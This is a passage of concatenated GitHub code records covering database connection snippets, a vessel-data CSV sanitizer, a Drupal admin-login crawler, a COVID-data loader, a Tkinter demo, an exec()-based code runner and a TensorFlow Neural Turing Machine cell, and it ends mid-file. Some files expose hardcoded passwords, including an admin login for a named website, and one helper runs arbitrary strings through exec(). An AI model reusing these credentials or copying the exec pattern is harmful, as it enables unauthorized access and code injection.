\"mysql\"\ndriver = \"pymysql\"\nusuario = \"huan\"\nsenha = \"A-queseja1genio\"\nhost = \"127.0.0.1\"\nporta = \"3306\"\ndb = \"olist\"\n\n\nengine = create_engine(f\"{dialeto}+{driver}://{usuario}:{senha}@{host}:{porta}/{db}\")\n\nprint(engine.connect())","repo_name":"huanbarrosn/Estudos","sub_path":"programacao/sqlalchemy/aula.py","file_name":"aula.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35321560108","text":"import argparse\nfrom datetime import datetime\nfrom glob import glob\nimport json\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport sys\n\ntry:\n from config import OUTPUT_COLUMN_NAMES, COLUMN_NAMES, VESSEL_NAMES\nexcept ImportError as e:\n print(f\"failed to import from cmdline_args.py: {e}\")\n\n\ndef convert_to_timestamp(dt, encoding=\"utf-8\") -> int:\n try:\n return int(datetime.fromisoformat(dt).timestamp())\n except Exception as e:\n printv(f\"failed to convert to datetime: {dt} type {type(dt)}: {e} skipping\")\n return 0\n\n\ndef parse_args() -> dict:\n \"\"\"\n parse_args -> dict\n\n instantiate an argument parser object\n to parse the command line argument supplied by the user\n\n returns a dictionary containing all parsed command line options\n\n \"\"\"\n argp = argparse.ArgumentParser()\n\n argp.add_argument(\n \"-i\",\n \"--input-dir\",\n help=\"input directory containing data files\",\n default=os.path.curdir,\n )\n argp.add_argument(\n \"-p\",\n \"--input-pattern\",\n help=\"input pattern used to glob data files\",\n default=\"*.csv\",\n )\n argp.add_argument(\n \"-o\",\n \"--output-dir\",\n help=\"output directory, defaults to the current working directory\",\n default=os.path.curdir,\n )\n argp.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"if provided, the logging level will be set to DEBUG\",\n action=\"store_true\",\n default=False,\n )\n cmdline_args = argp.parse_args().__dict__\n\n assert os.path.isdir(cmdline_args[\"input_dir\"]), f\"not a directory: {cmdline_args['input_dir']}\"\n assert os.path.isdir(\n cmdline_args[\"output_dir\"]\n ), f\"not a directory: {cmdline_args['output_dir']}\"\n\n return cmdline_args\n\n\ndef printv(message : str):\n global cmdline_args\n if 
cmdline_args[\"verbose\"]:\n print(message)\n\n\ndef read_file(\n file_path: str, column_names: list, delimiter=\";\", skip_lines=1\n) -> pd.DataFrame:\n \"\"\"\n read_file() -> pd.DataFrame\n\n reads in a given csv file from marine traffic.\n\n returns a pandas DataFrame with the following columns\n mmsi | latitude | longitude | speed | heading | course | status | timestamp |\n \"\"\"\n data = pd.read_csv(\n file_path,\n names=column_names,\n delimiter=delimiter,\n converters={7: convert_to_timestamp},\n skiprows=skip_lines,\n )\n data.rename(columns={\"timestamp\": \"epoch\"}, inplace=True)\n # reorder columns in table\n data = data.loc[:, OUTPUT_COLUMN_NAMES]\n return data\n\n\ndef parse_ship_data(data: pd.DataFrame) -> dict:\n \"\"\"\n parse_ship_data -> pandas.DataFrame\n\n parses raw data from a csv file contained in a DataFrame\n and returns a dictionary containing dataframes for each individual vessel.\n \"\"\"\n\n available_mmsi = data.mmsi.unique()\n printv(f\"found {len(available_mmsi)} unique ships: {available_mmsi}\")\n\n for mmsi in available_mmsi:\n printv(f\"processing {mmsi}\")\n if mmsi in VESSEL_NAMES:\n printv(f\"parsing data for {mmsi} -> {VESSEL_NAMES[mmsi]}\")\n else:\n printv(f\"did not find mmsi {mmsi} in VESSEL_NAMES\")\n # leverage the awesome power of pandas and selecet only data where\n # the mmsi equals the current mmsi\n vessel_data = data[data[\"mmsi\"] == mmsi].copy()\n # convert timestamps to pd.DateTime objects\n vessel_data.insert(\n loc=0,\n value=pd.to_datetime(vessel_data[\"epoch\"], unit=\"s\", utc=True),\n column=\"timestamp\",\n )\n # make the newly create epoch the index of the DataFrame\n vessel_data.set_index(\"timestamp\", inplace=True)\n # drop the mmsi data column as it is constant for the whole dataframe\n vessel_data.drop(\"mmsi\", axis=1, inplace=True)\n yield (mmsi, vessel_data)\n\n\ndef sanitize_marinetraffic(cmdline_args : dict):\n printv(\"done parsing commmand line arguments\")\n printv(f\"{json.dumps(cmdline_args, indent=4)}\")\n # build a list of available files using the provided input directory, the glob matching pattern\n # and the glob function\n input_files = sorted(glob(os.path.join(cmdline_args[\"input_dir\"], cmdline_args[\"input_pattern\"])))\n if not len(input_files) > 0:\n print(f\"did not find any input files. 
exit.\")\n sys.exit()\n printv(f\"found {len(input_files)} input files: {input_files}\")\n frames = list()\n for data_file in input_files:\n # read in all available data files\n frames.append(read_file(data_file, column_names=COLUMN_NAMES))\n # merge data frames into one large data frame\n try:\n frames = pd.concat(frames)\n except Exception as e:\n print(f\"failed to concatenate DataFrames: {e}\")\n sys.exit()\n # sanitize data and extract data frames for individual ships\n for mmsi, vessel_data in parse_ship_data(frames):\n export_path = os.path.join(\n cmdline_args[\"output_dir\"],\n f'{mmsi}-{VESSEL_NAMES[mmsi].lower().replace(\" \", \"-\")}.csv',\n )\n printv(f\"exporting vessel data to {export_path}\")\n try:\n vessel_data.to_csv(export_path)\n except Exception as e:\n print(f\"failed to export pandas dataframe: {e}\")\n\n\n#################################################\n\nif __name__ == \"__main__\":\n cmdline_args = parse_args()\n sanitize_marinetraffic(cmdline_args)\n","repo_name":"k323r/2022_WES_offshore-wind-installation","sub_path":"src/marinetraffic/sanitize_marinetraffic.py","file_name":"sanitize_marinetraffic.py","file_ext":"py","file_size_in_byte":5461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13410469144","text":"import requests\nfrom bs4 import BeautifulSoup\ns = requests.Session()\n\n\n# URL without http and any leading or trailing slashes\nprd_url = 'www.redwingsseasontickets.com'\nusername = 'redwings_admin'\npassword = \"redwingsadmin\"\n\n\n\n\n\ndef login():\t\t \n URL = \"https://\" + prd_url + \"/user/login\"\n params = {\"name\": username, \"pass\" : password, \"form_id\" : \"user_login\"}\n head = {\"Referer\":URL,'Host': prd_url,\"Accept\":\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\"}\n signin = s.post(URL, data = params, headers = head)\n print(signin.text) \n\ndef links(menu):\n menu_url = \"https://\" + prd_url + menu\n sorce = s.get(menu_url)\n sorce_text = sorce.text\n soup = BeautifulSoup(sorce_text, \"html.parser\")\n tbody = soup.find('tbody')\n main_menu = {}\n for row in tbody.findAll(\"a\", href = True, text = True):\n if row.text != 'edit' and row.text != 'delete' and row.text != 'Archive' and row.text != 'Bullpen' and row.text != 'Stand-Alone' and row['href'] != 'my-calendar' and row['href'] != 'calendar':\n main_menu[row.text] = prd_url + row['href']\n for name,path in main_menu.items():\n if path.find('http') == -1:\n path = \"https://\" + path\n visit = s.get(path)\n page_content = visit.text\n page_content = BeautifulSoup(page_content, \"html.parser\")\n article = page_content.findAll('article') \n if article: \n tab = 0 \n for tabs in article: \n for img in tabs.findAll(\"img\"):\n if img['src']: \n src = img['src']\n if src.find('cloudfront') != -1:\n out = \"FOUND CloudFront path in '\" + name + \"[\" + str(tab) + \"]\" + \"' = \" + path\n else:\n out = \"NO CloudFront Path in '\" + name + \"[\" + str(tab) + \"]\" + \"' = \" + path\n else:\n out = \"NO Image in '\" + name + \"' = \" + path\n print(out)\n tab += 1 \n\n\nlogin()\n\nmain = \"/admin/structure/menu/manage/main-menu\"\nanonymous = \"/admin/structure/menu/manage/menu-anonymous-menu\"\nlinks(main)\nlinks(anonymous)\n","repo_name":"ronit29/STP-Cloudfront-crawler-","sub_path":"drupal_login.py","file_name":"drupal_login.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"21288992190","text":"from datasource.Sipder import getTencentData,getHotData,getHotSearchData\nimport utils.JdbcTemplet as jdbc\nimport sys\ndef insertHistory(data):\n \"\"\"\n 将抓取的数据解析 插入数据库\n :return:\n \"\"\"\n #封装字典前 先判断当前数据是否在表中存在 存在则不插入\n ds = data['lastUpdateTime']\n res = jdbc.getHistoryByDs(ds)\n if len(res) >0 :\n return\n\n history={}\n history['ds']=ds\n history['confirm'] =data['chinaTotal']['confirm']\n history['confirm_add']=data['chinaAdd']['confirm'] #新增确诊\n history['now_confirm']=data['chinaTotal']['nowConfirm'] #现有确诊\n history['heal']=data['chinaTotal']['heal'] #累计治愈\n history['heal_add']=data['chinaAdd']['heal'] #新增治愈\n history['dead']=data['chinaTotal']['dead']\n history['dead_add']=data['chinaAdd']['dead']\n\n #插入数据库\n jdbc.insertHistery(history)\n pass\n\ndef insertDetails(data):\n \"\"\"\n 解析数据 将数据插入到details表中\n :param data: 数据源\n :return: list 一个列表 封装的是元组,每个元组便是一条数据\n \"\"\"\n #封装列表前 先判断当前数据是否在表中存在 存在则不插入\n update_time = data['lastUpdateTime']\n res = jdbc.getDetailsByTime(update_time)\n if len(res) >0 :\n return\n\n details = [] #数据列表\n countryList = data['areaTree']#国家树形数据 一个列表\n for countryDict in countryList:\n provinceList = countryDict['children']\n for provinceDict in provinceList :\n province = provinceDict['name'] #省\n cityList = provinceDict['children'] #市 列表\n for cityDict in cityList :\n city = cityDict['name'] #市\n confirm = cityDict['total']['confirm'] #累计确诊\n confirm_add = cityDict['today']['confirm'] #新增确诊\n heal = cityDict['total']['heal']\n dead = cityDict['total']['dead']\n #封装元组 加入列表\n details.append((update_time,province,city,confirm,confirm_add,heal,dead))\n\n #插入数据\n print(details)\n jdbc.insertDetails(details)\n pass\n\ndef insertHotSearch(hotSearchList,dt):\n \"\"\"\n 解析从百度抓取的热点数据,然后插入到数据库\n :param hotList:\n :return:\n \"\"\"\n #删除今日 热搜数据 在进行插入操作\n jdbc.delHotSearchData(dt)\n jdbc.insertHotSearch(hotSearchList)\n pass\n\n\nif __name__ == \"__main__\":\n length = len(sys.argv)\n if length == 1:\n msg = \"\"\"\n 请输入一下参数:\n up_tencent 更新腾讯疫情数据\n up_baidu 更新百度热点数据\n \"\"\"\n print(msg)\n else:\n arg = sys.argv[1]\n if arg == 'up_tencent':\n data = getTencentData()\n insertHistory(data)\n insertDetails(data)\n elif arg == 'up_baidu':\n hotSearchList, dt = getHotSearchData()\n insertHotSearch(hotSearchList, dt)\n else:\n msg = '无效参数,请仔细检查!'\n print(msg)\n\n","repo_name":"Aaron-cell/NewCrown","sub_path":"datasource/DataAnalyze.py","file_name":"DataAnalyze.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28497646081","text":"from tkinter import *\nfrom PIL import ImageTk,Image\nroot = Tk()\nroot.title('Vishwa Praveen')\nroot.iconbitmap('icon.ico')\n\nmy_img = ImageTk.PhotoImage(Image.open(\"icon.ico\"))\nmy_label = Label(image =my_img)\nmy_label.pack()\n\n\n\n\nexit_button = Button(root, text=\"Exit\", command=root.quit)\nexit_button.pack()\n\n\n\n\nroot.mainloop()\n","repo_name":"vps4618/Tkinter_Codemy","sub_path":"Using Icons, Images, and Exit Buttons - Python Tkinter GUI Tutorial #8.py","file_name":"Using Icons, Images, and Exit Buttons - Python Tkinter GUI Tutorial #8.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73359018729","text":"import roots\nimport cfunctions\n\ndef execCode(code):\n try:\n global output\n exec(f\"global output\\noutput = None\\n{code}\")\n if output == None:\n output = \"output variable was not 
specified or is None\"\n return output\n except Exception as e:\n return f\"ERROR: {e}\"\n","repo_name":"cristian-bicheru/python-math-tool","sub_path":"source/others.py","file_name":"others.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20850129405","text":"# credit: thanks to https://github.com/snowkylin/ntm for the basis of this code\n# the major changes made are to make this compatible with the abstract class tf.contrib.rnn.RNNCell\n# additionally an LSTM controller is used, a feed-forward controller may be used\n# and 2 memory inititialization schemes are offered\n\nimport tensorflow as tf\nfrom collections import namedtuple\nfrom ntm_utils import expand, learned_init, create_linear_initializer\n\nModel1NTMState = namedtuple('Model1NTMState',\n ('controller_state', 'time', 'prev_output',\n 'att_read_vector_list', 'att_w_list', 'att_w_history', 'att_M'))\n\nModel2NTMState = namedtuple('Model2NTMState',\n ('controller_state', 'time', 'prev_output',\n 'ext_read_vector_list', 'ext_w_list', 'ext_w_history', 'ext_M',\n 'att_read_vector_list', 'att_w_list', 'att_w_history', 'att_M'))\n\nModel3NTMState = namedtuple('Model3NTMState',\n ('controller_state', 'time', 'prev_output',\n 'ext_read_vector_list', 'ext_w_list', 'ext_w_history', 'ext_M'))\n\nclass NTMCell(tf.contrib.rnn.RNNCell):\n def __init__(self, controller_layers, controller_units,\n use_att_memory=True, att_memory=None, att_memory_size=None, att_memory_vector_dim=None,\n use_ext_memory=False, ext_memory_size=None, ext_memory_vector_dim=None, ext_read_head_num=None, ext_write_head_num=None,\n dropout=0.0, batch_size=None, mode=None, addressing_mode='content_and_location',\n shift_range=1, reuse=False, output_dim=None, clip_value=20, record_w_history=False):\n self.controller_layers = controller_layers\n self.controller_units = controller_units\n\n self.att_memory_size = att_memory_size\n self.att_memory_vector_dim = att_memory_vector_dim\n self.ext_memory_size = ext_memory_size\n self.ext_memory_vector_dim = ext_memory_vector_dim\n\n self.att_read_head_num = 1 if att_memory is not None else 0\n self.ext_read_head_num = ext_read_head_num\n self.total_read_head_num = self.att_read_head_num + (ext_read_head_num if ext_read_head_num is not None else 0)\n self.ext_write_head_num = ext_write_head_num\n\n self.use_att_memory = use_att_memory\n self.use_ext_memory = use_ext_memory\n\n # need to reshape memory in order to get beam search working\n if self.use_att_memory:\n self.att_M = tf.reshape(att_memory, [-1, self.att_memory_size * self.att_memory_vector_dim])\n else:\n self.att_M = None\n\n self.addressing_mode = addressing_mode\n self.reuse = reuse\n self.clip_value = clip_value\n\n self.dropout = dropout if mode == tf.contrib.learn.ModeKeys.TRAIN else 0.0\n def single_cell(num_units):\n cell = tf.contrib.rnn.BasicLSTMCell(num_units, forget_bias=1.0)\n if self.dropout > 0.0:\n cell = tf.contrib.rnn.DropoutWrapper(cell=cell, input_keep_prob=(1.0 - self.dropout))\n return cell\n\n self.controller = tf.contrib.rnn.MultiRNNCell([single_cell(self.controller_units) for _ in range(self.controller_layers)])\n\n self.step = 0\n self.output_dim = output_dim\n self.shift_range = shift_range\n self.batch_size = batch_size\n self.mode = mode\n self.record_w_history = record_w_history\n\n self.o2p_initializer = create_linear_initializer(self.controller_units)\n self.o2o_initializer = create_linear_initializer(\n self.controller_units + \\\n 
(self.att_memory_vector_dim if self.use_att_memory else 0) + \\\n (self.ext_memory_vector_dim * self.ext_read_head_num if self.use_ext_memory else 0))\n\n def interact_with_memory(self, prev_state, controller_output, att=True):\n num_parameters_per_head = (self.att_memory_vector_dim if att else self.ext_memory_vector_dim) + 1 + 1 + (self.shift_range * 2 + 1) + 1\n num_heads = 1 if att else (self.ext_read_head_num + self.ext_write_head_num)\n total_parameter_num = num_parameters_per_head if att else (num_parameters_per_head * num_heads + self.ext_memory_vector_dim * 2 * self.ext_write_head_num)\n with tf.variable_scope(\"o2p_att_\" + str(att), reuse=tf.AUTO_REUSE):\n parameters = tf.contrib.layers.fully_connected(\n controller_output, total_parameter_num, activation_fn=None,\n weights_initializer=self.o2p_initializer)\n parameters = tf.clip_by_value(parameters, -self.clip_value, self.clip_value)\n head_parameter_list = tf.split(parameters[:, :num_parameters_per_head * num_heads], num_heads, axis=1)\n\n if att:\n prev_w_list = prev_state.att_w_list\n prev_M = prev_state.att_M\n prev_M = tf.reshape(prev_M, [-1, self.att_memory_size, self.att_memory_vector_dim])\n memory_vector_dim = self.att_memory_vector_dim\n else:\n prev_w_list = prev_state.ext_w_list\n prev_M = prev_state.ext_M\n prev_M = tf.reshape(prev_M, [-1, self.ext_memory_size, self.ext_memory_vector_dim])\n memory_vector_dim = self.ext_memory_vector_dim\n \n w_list = []\n for i, head_parameter in enumerate(head_parameter_list):\n k = tf.tanh(head_parameter[:, 0:memory_vector_dim])\n beta = tf.nn.softplus(head_parameter[:, memory_vector_dim])\n g = tf.sigmoid(head_parameter[:, memory_vector_dim + 1])\n s = tf.nn.softmax(\n head_parameter[:, memory_vector_dim + 2:memory_vector_dim + 2 + (self.shift_range * 2 + 1)]\n )\n gamma = tf.nn.softplus(head_parameter[:, -1]) + 1\n with tf.variable_scope('addressing_head_%d' % i):\n w = self.addressing(k, beta, g, s, gamma, prev_M, prev_w_list[i], att=att)\n w_list.append(w)\n\n # Reading (Sec 3.1)\n\n if att:\n read_vector_list = [tf.reduce_sum(tf.expand_dims(w_list[0], dim=2) * prev_M, axis=1)]\n else:\n read_w_list = w_list[:self.ext_read_head_num]\n read_vector_list = []\n for i in range(self.ext_read_head_num):\n read_vector = tf.reduce_sum(tf.expand_dims(read_w_list[i], dim=2) * prev_M, axis=1)\n read_vector_list.append(read_vector)\n\n # Writing (Sec 3.2)\n\n M = prev_M\n if not att:\n erase_add_list = tf.split(parameters[:, num_parameters_per_head * num_heads:], 2 * self.ext_write_head_num, axis=1)\n write_w_list = w_list[self.ext_read_head_num:]\n for i in range(self.ext_write_head_num):\n w = tf.expand_dims(write_w_list[i], axis=2)\n erase_vector = tf.expand_dims(tf.sigmoid(erase_add_list[i * 2]), axis=1)\n add_vector = tf.expand_dims(tf.tanh(erase_add_list[i * 2 + 1]), axis=1)\n M = M * (tf.ones([self.batch_size, self.ext_memory_size, self.ext_memory_vector_dim]) - tf.matmul(w, erase_vector)) + tf.matmul(w, add_vector)\n\n return read_vector_list, w_list, M\n\n def __call__(self, x, prev_state):\n if self.use_att_memory and self.use_ext_memory:\n prev_state = Model2NTMState(*prev_state)\n elif self.use_att_memory:\n prev_state = Model1NTMState(*prev_state)\n else:\n prev_state = Model3NTMState(*prev_state)\n\n prev_read_vector_list = (prev_state.ext_read_vector_list if self.use_ext_memory else []) + \\\n (prev_state.att_read_vector_list if self.use_att_memory else [])\n\n controller_input = tf.concat([x] + prev_read_vector_list + [prev_state.prev_output], axis=1)\n with 
tf.variable_scope('controller', reuse=self.reuse):\n controller_output, controller_state = self.controller(controller_input, prev_state.controller_state)\n\n if self.use_att_memory:\n att_read_vector_list, att_w_list, att_M = self.interact_with_memory(prev_state, controller_output, att=True)\n att_M = tf.reshape(att_M, [-1, self.att_memory_size * self.att_memory_vector_dim])\n\n if self.use_ext_memory:\n ext_read_vector_list, ext_w_list, ext_M = self.interact_with_memory(prev_state, controller_output, att=False)\n ext_M = tf.reshape(ext_M, [-1, self.ext_memory_size * self.ext_memory_vector_dim])\n\n if not self.output_dim:\n output_dim = x.get_shape()[1]\n else:\n output_dim = self.output_dim\n with tf.variable_scope(\"o2o\", reuse=tf.AUTO_REUSE):\n read_vector_list = (ext_read_vector_list if self.use_ext_memory else []) + \\\n (att_read_vector_list if self.use_att_memory else [])\n\n NTM_output = tf.contrib.layers.fully_connected(\n tf.concat([controller_output] + read_vector_list, axis=1), output_dim, activation_fn=None,\n weights_initializer=self.o2o_initializer)\n NTM_output = tf.clip_by_value(NTM_output, -self.clip_value, self.clip_value)\n\n if self.dropout > 0.0:\n NTM_output = tf.nn.dropout(NTM_output, 1-self.dropout)\n\n self.step += 1\n\n # use explicit loops here: under Python 3, map() is lazy, so the original map(lambda v: v.set_shape(...), ...) calls were never executed\n if self.use_att_memory:\n for v in att_read_vector_list:\n v.set_shape([None, self.att_memory_vector_dim])\n for v in att_w_list:\n v.set_shape([None, self.att_memory_size])\n if self.use_ext_memory:\n for v in ext_read_vector_list:\n v.set_shape([None, self.ext_memory_vector_dim])\n for v in ext_w_list:\n v.set_shape([None, self.ext_memory_size])\n\n if self.use_att_memory and self.use_ext_memory:\n return NTM_output, tuple(Model2NTMState(\n time=prev_state.time + 1 if self.record_w_history else prev_state.time,\n controller_state=controller_state,\n ext_read_vector_list=ext_read_vector_list,\n ext_w_list=ext_w_list,\n ext_w_history=[prev_state.ext_w_history[i].write(prev_state.time, ext_w_list[i]) for i in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else prev_state.ext_w_history,\n ext_M=ext_M,\n att_read_vector_list=att_read_vector_list,\n att_w_list=att_w_list,\n att_w_history=prev_state.att_w_history.write(prev_state.time, att_w_list[0]) if self.record_w_history else prev_state.att_w_history,\n att_M=att_M,\n prev_output=NTM_output))\n elif self.use_att_memory:\n return NTM_output, tuple(Model1NTMState(\n time=prev_state.time + 1 if self.record_w_history else prev_state.time,\n controller_state=controller_state,\n att_read_vector_list=att_read_vector_list,\n att_w_list=att_w_list,\n att_w_history=prev_state.att_w_history.write(prev_state.time, att_w_list[0]) if self.record_w_history else prev_state.att_w_history,\n att_M=att_M,\n prev_output=NTM_output))\n else:\n return NTM_output, tuple(Model3NTMState(\n time=prev_state.time + 1 if self.record_w_history else prev_state.time,\n controller_state=controller_state,\n ext_read_vector_list=ext_read_vector_list,\n ext_w_list=ext_w_list,\n ext_w_history=[prev_state.ext_w_history[i].write(prev_state.time, ext_w_list[i]) for i in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else prev_state.ext_w_history,\n ext_M=ext_M,\n prev_output=NTM_output))\n\n def addressing(self, k, beta, g, s, gamma, prev_M, prev_w, att=True):\n k = tf.expand_dims(k, axis=2)\n inner_product = tf.matmul(prev_M, k)\n if att:\n inner_product = tf.squeeze(inner_product, axis=2)\n w_c = tf.nn.softmax(tf.expand_dims(beta, axis=1) * 
inner_product, dim=1)\n else:\n k_norm = tf.sqrt(tf.reduce_sum(tf.square(k), axis=1, keep_dims=True))\n M_norm = tf.sqrt(tf.reduce_sum(tf.square(prev_M), axis=2, keep_dims=True))\n norm_product = M_norm * k_norm\n K = tf.squeeze(inner_product / (norm_product + 1e-8)) # eq (6)\n\n # Calculating w^c\n\n K_amplified = tf.exp(tf.expand_dims(beta, axis=1) * K)\n w_c = K_amplified / tf.reduce_sum(K_amplified, axis=1, keep_dims=True) # eq (5)\n\n w_c = tf.squeeze(w_c)\n\n if att:\n w_c.set_shape([None, self.att_memory_size])\n else:\n w_c.set_shape([None, self.ext_memory_size])\n\n if self.addressing_mode == 'content': # Only focus on content\n return w_c\n\n # Sec 3.3.2 Focusing by Location\n\n g = tf.expand_dims(g, axis=1)\n w_g = g * w_c + (1 - g) * prev_w # eq (7)\n\n if att:\n s = tf.concat([s[:, :self.shift_range + 1],\n tf.zeros([self.batch_size, self.att_memory_size - (self.shift_range * 2 + 1)]),\n s[:, -self.shift_range:]], axis=1)\n t = tf.concat([tf.reverse(s, axis=[1]), tf.reverse(s, axis=[1])], axis=1)\n s_matrix = tf.stack(\n [t[:, self.att_memory_size - i - 1:self.att_memory_size * 2 - i - 1] for i in range(self.att_memory_size)],\n axis=1\n )\n else:\n s = tf.concat([s[:, :self.shift_range + 1],\n tf.zeros([self.batch_size, self.ext_memory_size - (self.shift_range * 2 + 1)]),\n s[:, -self.shift_range:]], axis=1)\n t = tf.concat([tf.reverse(s, axis=[1]), tf.reverse(s, axis=[1])], axis=1)\n s_matrix = tf.stack(\n [t[:, self.ext_memory_size - i - 1:self.ext_memory_size * 2 - i - 1] for i in range(self.ext_memory_size)],\n axis=1\n )\n \n w_ = tf.reduce_sum(tf.expand_dims(w_g, axis=1) * s_matrix, axis=2) # eq (8)\n w_sharpen = tf.pow(w_, tf.expand_dims(gamma, axis=1))\n w = w_sharpen / tf.reduce_sum(w_sharpen, axis=1, keep_dims=True) # eq (9)\n\n return w\n\n def zero_state(self, batch_size, dtype):\n with tf.variable_scope('init', reuse=self.reuse):\n controller_init_state = self.controller.zero_state(batch_size, dtype)\n prev_output = tf.zeros([batch_size, self.output_dim])\n\n if self.use_ext_memory:\n ext_read_vector_list = [expand(tf.tanh(learned_init(self.ext_memory_vector_dim)), dim=0, N=batch_size, dims=1)\n for i in range(self.ext_read_head_num)]\n\n ext_w_list = [expand(tf.nn.softmax(learned_init(self.ext_memory_size)), dim=0, N=batch_size, dims=1)\n for i in range(self.ext_read_head_num + self.ext_write_head_num)]\n\n # ext_M = expand(tf.tanh(learned_init(self.ext_memory_size * self.ext_memory_vector_dim)), dim=0, N=batch_size, dims=1)\n\n ext_M = expand(tf.get_variable('init_M', self.ext_memory_size * self.ext_memory_vector_dim,\n initializer=tf.constant_initializer(1e-6)),\n dim=0, N=batch_size, dims=1)\n\n if self.use_att_memory:\n att_read_vector_list = [expand(tf.tanh(learned_init(self.att_memory_vector_dim)), dim=0, N=batch_size, dims=1)]\n att_w_list = [expand(tf.nn.softmax(learned_init(self.att_memory_size)), dim=0, N=batch_size, dims=1)]\n\n if self.use_att_memory and self.use_ext_memory:\n # tmp_att_M = tf.reshape(self.att_M, [-1, self.att_memory_size, self.att_memory_vector_dim])\n # m = tf.contrib.layers.fully_connected(tf.reduce_mean(tmp_att_M, axis=1), self.ext_memory_vector_dim,\n # activation_fn=tf.tanh, weights_initializer=create_linear_initializer(self.att_memory_vector_dim))\n # ext_M = tf.tile(tf.expand_dims(m, 1), multiples=[1, self.ext_memory_size, 1]) + tf.random_normal([batch_size, self.ext_memory_size, self.ext_memory_vector_dim], stddev=0.316)\n # ext_M = tf.reshape(ext_M, [-1, self.ext_memory_size * self.ext_memory_vector_dim])\n\n # return 
tuple(Model2NTMState(\n # controller_state=controller_init_state,\n # ext_read_vector_list=ext_read_vector_list,\n # ext_w_list=ext_w_list,\n # ext_M=ext_M,\n # att_read_vector_list=att_read_vector_list,\n # att_w_list=att_w_list,\n # att_M=self.att_M,\n # prev_output=prev_output))\n\n return tuple(Model2NTMState(\n time=tf.zeros([], dtype=tf.int32) if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n controller_state=controller_init_state,\n ext_read_vector_list=ext_read_vector_list,\n ext_w_list=ext_w_list,\n ext_w_history=[tf.TensorArray(dtype=dtype, size=0, dynamic_size=True) for _ in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n ext_M=ext_M,\n att_read_vector_list=att_read_vector_list,\n att_w_list=att_w_list,\n att_w_history=tf.TensorArray(dtype=dtype, size=0, dynamic_size=True) if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n att_M=self.att_M,\n prev_output=prev_output))\n elif self.use_att_memory:\n return tuple(Model1NTMState(\n time=tf.zeros([], dtype=tf.int32) if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n controller_state=controller_init_state,\n att_read_vector_list=att_read_vector_list,\n att_w_list=att_w_list,\n att_w_history=tf.TensorArray(dtype=dtype, size=0, dynamic_size=True)if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n att_M=self.att_M,\n prev_output=prev_output))\n else:\n return tuple(Model3NTMState(\n time=tf.zeros([], dtype=tf.int32) if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n controller_state=controller_init_state,\n ext_read_vector_list=ext_read_vector_list,\n ext_w_list=ext_w_list,\n ext_w_history=[tf.TensorArray(dtype=dtype, size=0, dynamic_size=True) for _ in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else tf.zeros([batch_size, 1], dtype=tf.int32),\n ext_M=ext_M,\n prev_output=prev_output))\n\n @property\n def state_size(self):\n if self.use_att_memory and self.use_ext_memory:\n return tuple(Model2NTMState(\n time=tf.TensorShape([]) if self.record_w_history else tf.TensorShape([1]),\n controller_state=self.controller.state_size,\n ext_read_vector_list=[self.ext_memory_vector_dim for _ in range(self.ext_read_head_num)],\n ext_w_list=[self.ext_memory_size for _ in range(self.ext_read_head_num + self.ext_write_head_num)],\n ext_w_history=[tuple() for _ in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else tf.TensorShape([1]),\n ext_M=tf.TensorShape([self.ext_memory_size * self.ext_memory_vector_dim]),\n att_read_vector_list=[self.att_memory_vector_dim],\n att_w_list=[self.att_memory_size],\n att_w_history=tuple() if self.record_w_history else tf.TensorShape([1]),\n att_M=tf.TensorShape([self.att_memory_size * self.att_memory_vector_dim]),\n prev_output=tf.TensorShape([self.output_dim])))\n elif self.use_att_memory:\n return tuple(Model1NTMState(\n time=tf.TensorShape([]) if self.record_w_history else tf.TensorShape([1]),\n controller_state=self.controller.state_size,\n att_read_vector_list=[self.att_memory_vector_dim],\n att_w_list=[self.att_memory_size],\n att_w_history=tuple() if self.record_w_history else tf.TensorShape([1]),\n att_M=tf.TensorShape([self.att_memory_size * self.att_memory_vector_dim]),\n prev_output=tf.TensorShape([self.output_dim])))\n else:\n return tuple(Model3NTMState(\n time=tf.TensorShape([]) if self.record_w_history else tf.TensorShape([1]),\n 
controller_state=self.controller.state_size,\n ext_read_vector_list=[self.ext_memory_vector_dim for _ in range(self.ext_read_head_num)],\n ext_w_list=[self.ext_memory_size for _ in range(self.ext_read_head_num + self.ext_write_head_num)],\n ext_w_history=[tuple() for _ in range(self.ext_read_head_num + self.ext_write_head_num)] if self.record_w_history else tf.TensorShape([1]),\n ext_M=tf.TensorShape([self.ext_memory_size * self.ext_memory_vector_dim]),\n prev_output=tf.TensorShape([self.output_dim])))\n\n @property\n def output_size(self):\n return self.output_dim\n","repo_name":"MarkPKCollier/MANNs4NMT","sub_path":"nmt/ntm.py","file_name":"ntm.py","file_ext":"py","file_size_in_byte":21401,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"702672322","text":"from typing import *\nimport random\nimport os\nimport time\n\nhalmaz1: List[int] = []\nhalmaz2: List[int] = []\nosszeg:int = 0\n\ndef szamBeolvasasa(mini:int, maxi:int)-> int:\n 